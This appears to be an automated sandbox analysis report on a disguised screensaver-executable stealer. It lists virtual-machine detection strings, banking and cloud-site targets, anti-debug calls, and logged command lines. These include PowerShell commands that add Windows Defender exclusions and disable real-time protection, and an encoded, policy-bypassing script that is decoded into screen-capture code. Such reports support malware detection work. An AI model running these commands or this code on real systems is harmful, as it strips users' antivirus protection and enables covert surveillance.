Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"h
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d2qemu-ga
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWncel%SystemRoot%\system32\mswsock.dlltative host not found.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f8vmusrvc
Source: getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-VT
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2150926613.0000028C88DAD000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322447495.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163848479.0000028C87C28000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163106879.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2153913048.0000028C88B6D000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323961811.0000028C88B6F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: fecodevmsrvc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: getmac.exe, 00000031.00000002.2152634842.0000020D5DEC1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151715495.0000020D5DEBE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicera
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF73AE2ABD8

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FF8A86A7B30

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 0_2_00007FF73AE33AF0 GetProcessHeap,

0_2_00007FF73AE33AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE2ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF73AE2ABD8
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE1BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF73AE1BCE0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE1C760 SetUnhandledExceptionFilter,	0_2_00007FF73AE1C760
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE1C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF73AE1C57C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 2_2_00007FF8A8093068 IsProcessorFeaturePresent,00007FF8BA251730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BA251730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF8A8093068
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EDB6D8 SetUnhandledExceptionFilter,	68_2_00007FF7F7EDB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EDA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	68_2_00007FF7F7EDA66C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EDB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	68_2_00007FF7F7EDB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EE4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	68_2_00007FF7F7EE4C10

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
